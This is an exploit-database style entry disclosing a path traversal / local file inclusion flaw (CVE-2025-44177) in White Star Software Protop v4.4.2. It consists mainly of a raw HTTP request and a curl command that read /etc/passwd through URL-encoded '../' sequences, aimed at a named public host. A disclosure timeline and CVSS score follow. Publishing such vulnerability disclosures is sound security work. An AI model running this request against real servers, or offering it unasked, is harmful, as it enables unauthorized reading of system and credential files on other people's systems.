# Exploit Title: White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI) # Date: 2025-07-09 # Exploit Author: Imraan Khan (Lich-Sec) # Vendor Homepage: https://wss.com/ # Software Link: https://client.protop.co.za/ # Version: v4.4.2-2024-11-27 # Tested on: Ubuntu 22.04 / Linux # CVE: CVE-2025-44177 # CWE: CWE-22 - Path Traversal # Description: # A Local File Inclusion vulnerability exists in White Star Software Protop v4.4.2. # An unauthenticated remote attacker can retrieve arbitrary files via # URL-encoded traversal sequences in the `/pt3upd/` endpoint. # Vulnerable Endpoint: GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 Host: client.protop.co.za User-Agent: curl/8.0 Accept: */* # Example curl command: curl -i 'https://client.protop.co.za/pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd' # Notes: # - Vulnerability confirmed on public instance at time of testing. # - CVSS v3.1 Base Score: 8.2 (AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N) # - The vendor was notified and a fix was issued. # Disclosure Timeline: # - Discovered: 2025-03-13 # - Disclosed to vendor: 2025-03-20 # - CVE Assigned: 2025-07-01 # - Public Disclosure: 2025-07-09